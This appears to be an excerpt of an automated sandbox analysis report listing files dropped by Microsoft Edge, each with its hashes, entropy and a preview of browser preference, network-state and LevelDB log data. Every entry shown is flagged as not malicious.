                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.399 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-08:55:33.400 1eb4 Recovering log #3.2024/12/18-08:55:33.400 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEfl+q:/M/xT02z7q
                                                                                                                                                                                                                                                                                                        MD5:01CC6E02A6A8AACA06EDFE7460E1E085
                                                                                                                                                                                                                                                                                                        SHA1:F6606FD6600C8D0FC5EAA51FEBF8F441BE83E456
                                                                                                                                                                                                                                                                                                        SHA-256:BECBDBC7C0DEA5FF08AAAD7F6918769416C485C2F16D457A970C7CC6945F3F37
                                                                                                                                                                                                                                                                                                        SHA-512:876988B01FADDBBC0A1F1BB4A69B23A0697A549E5D7AB1EC7ED46E458C25FD4D763D90EA64D6264B9CB4D2062EBABF4933BB21FB0B9CE92B2E34A5CDE996BA66
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5732213252375334
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:+buWyejzH+bDoYysX0IxQzpkHtpVJNlYDLjGQLBE3CeE0kEh//:+ThH+bDo3iN0p2TVJkXBBE3ybOH
                                                                                                                                                                                                                                                                                                        MD5:91861C0F39F82E5AA622BFEBC75751EE
                                                                                                                                                                                                                                                                                                        SHA1:2C0EFE74C0E80B9CE134A1803DEB2245C87608FF
                                                                                                                                                                                                                                                                                                        SHA-256:90CFB602EFD7AEF00A7A09AAC0EF9059FDC922664FF4E60A3CBE1EFA330B1D37
                                                                                                                                                                                                                                                                                                        SHA-512:C74F32DBB654C05B5DB2C246D885E394F7C842F00357D71E34552FE586C780409CB0FD53A5976EA5C28DAF5A171718B6BEC3221A3462BEDCCC04288B1ECC180C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141503223075537
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEWTL+q2PsZ23oH+Tcwt8a2jMGIFUt8ORQEW2oKWZmw+ORQEWCjLVkwOsZ23oL:72rL+vkcYeb8EFUt8O2qW/+O2ajLV51t
                                                                                                                                                                                                                                                                                                        MD5:30FF39B6FA26BFC427BA12ABDD8F034F
                                                                                                                                                                                                                                                                                                        SHA1:3A51640FCF9BFC598B3DCCA7B2958CFF56F0E8C6
                                                                                                                                                                                                                                                                                                        SHA-256:96571C4AE728CDDCD969D5C330B220056EB1299609D5319BCE3A9CB65D7F26CD
                                                                                                                                                                                                                                                                                                        SHA-512:F6429EA38E0C844C908ED3DCE9E5B6135E683CB5DA96B0EF8490F05C62A00B7375A1BB139B4E6699A58D347DE5CE96FF65C047217D2582F58E78E68968C6B584
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.350 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:34.352 53c Recovering log #3.2024/12/18-08:55:34.355 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141503223075537
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEWTL+q2PsZ23oH+Tcwt8a2jMGIFUt8ORQEW2oKWZmw+ORQEWCjLVkwOsZ23oL:72rL+vkcYeb8EFUt8O2qW/+O2ajLV51t
                                                                                                                                                                                                                                                                                                        MD5:30FF39B6FA26BFC427BA12ABDD8F034F
                                                                                                                                                                                                                                                                                                        SHA1:3A51640FCF9BFC598B3DCCA7B2958CFF56F0E8C6
                                                                                                                                                                                                                                                                                                        SHA-256:96571C4AE728CDDCD969D5C330B220056EB1299609D5319BCE3A9CB65D7F26CD
                                                                                                                                                                                                                                                                                                        SHA-512:F6429EA38E0C844C908ED3DCE9E5B6135E683CB5DA96B0EF8490F05C62A00B7375A1BB139B4E6699A58D347DE5CE96FF65C047217D2582F58E78E68968C6B584
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.350 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:34.352 53c Recovering log #3.2024/12/18-08:55:34.355 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.305225449403416
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YXssZVMdBsE8FZFRudFGcsRZ6ma3yeevbC7n7:YXsU8sHTfcdsXleevbM
                                                                                                                                                                                                                                                                                                        MD5:58FC2E60D1ADF51FEAF90DEBE5009DC0
                                                                                                                                                                                                                                                                                                        SHA1:E1F49E05BC62E6ED53D24F76A406DC9E65871BDF
                                                                                                                                                                                                                                                                                                        SHA-256:B2B52B0A2A086358020394BD97B5C2797F29B1919E0B3E151977B8D9B67DB906
                                                                                                                                                                                                                                                                                                        SHA-512:BD25DD4BA357C345D0147B1479E2EA35B8D0167AB575686165D03FCDB436577EADCBC5614AC0D23589D10C4497C7B95E801366D1AD55FAEF52C7293DF1F682BB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381595737587309","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381595740359644","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379097380074983","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24723
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56861186921997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220BhCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwnupItu9R:220BhCWPfCfxDu1jaVFcLnZtc
                                                                                                                                                                                                                                                                                                        MD5:90F193A17F0C6D72CA8803CD03779C8A
                                                                                                                                                                                                                                                                                                        SHA1:98EAC7B99EEBA7CCE56B32AA8724AEE9AF35ED67
                                                                                                                                                                                                                                                                                                        SHA-256:3CD64657BC0012905D1164142F4B46FB98F4EF22D8F59E2278CF53D67CBDA0BB
                                                                                                                                                                                                                                                                                                        SHA-512:98406CD0C774802E1B3D162A0A48E3CA024ABF766F4EC7F68163B6FCF108BE5D20F51FA6495A7E4E885ED9B315F448FDCDF65BAD0EC2BB6A4522ED8B75A04FBB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.372948992290691
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:S85aEFljljljljl/2larlIGqrjZD4IEEEEYX1EIaIGqrjZDj:S+a8ljljljljl+CIGqrjZAX1oIGqrjZj
                                                                                                                                                                                                                                                                                                        MD5:95EDD38C472AAF5753564EE0DFFBC9CA
                                                                                                                                                                                                                                                                                                        SHA1:D31267A403AA91636081EE51CBD50899111A2CA8
                                                                                                                                                                                                                                                                                                        SHA-256:B595058109ACF8F1481089E87E77BC23475C6EE8D60E36DFFE7BE082CDAA3E9F
                                                                                                                                                                                                                                                                                                        SHA-512:84C18F502170163D129D5E2200AFE5AA447B0083AFC109D6CC110902BD595415DBDF49862D26B70FAD248029ACE7A474C7054314A11FA99B0DCBA4CB5450CC33
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................3d................next-map-id.1.Enamespace-e3dc0814_49a0_4861_9d72_44df88d45629-http://127.0.0.1:8000/.0V.e................V.e................V.e................V.e................V.e..................g.S...............Enamespace-e3dc0814_49a0_4861_9d72_44df88d45629-http://127.0.0.1:8000/
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.089925509823483
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQwglyq2PsZ23oH+TcwtrQMxIFUt8ORQwW711Zmw+ORQwm9RkwOsZ23oH+Tcwtf:72SvkcYebCFUt8O2311/+O2j751cYebf
                                                                                                                                                                                                                                                                                                        MD5:BABBBB0968956E094EF546424AF40E5F
                                                                                                                                                                                                                                                                                                        SHA1:C3860B63487A3995C4707A5B57360773D85F710F
                                                                                                                                                                                                                                                                                                        SHA-256:14E6FC57330E652CFB48D6A82EBB6FCA4101B43590E2FD5CC8029EF57264AE42
                                                                                                                                                                                                                                                                                                        SHA-512:5A63444BDD2B5DA0906F0C7141EBAD5FAC792208959F27FC6F463E0C5CAB59B86372BCAADE11FCC8FDCCBCF9917D5C07676E7AC5F9029DCEA6313768630E082B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:30.143 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-08:55:30.147 1ae0 Recovering log #3.2024/12/18-08:55:30.152 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1307
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5242673684186023
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:30o4RrjVOKMNv4d8aEE/KNXeECxG/4lOlZeP6XwQWZMMR:3BgrE3aE/NXelGzlZeiNWt
                                                                                                                                                                                                                                                                                                        MD5:3D48AF8743F6F787DCD02482B2DE94C2
                                                                                                                                                                                                                                                                                                        SHA1:1D9CD9D0EC947C3CCE4EAD70479658918C75B060
                                                                                                                                                                                                                                                                                                        SHA-256:B5C77AFAC86A6A8BBD8B1BA3EA5E52B26F27556A4F3784E07036A51C68178211
                                                                                                                                                                                                                                                                                                        SHA-512:BDE5AE53FAA15621A79A342A02D8694350BFB12559A557805558C16D0E98B6E50D0E8C771615600CCFE2AE89A09A5347647272256E1EF20A867CE39BC794C7E7
                                                                                                                                                                                                                                                                                                        Malicious:false
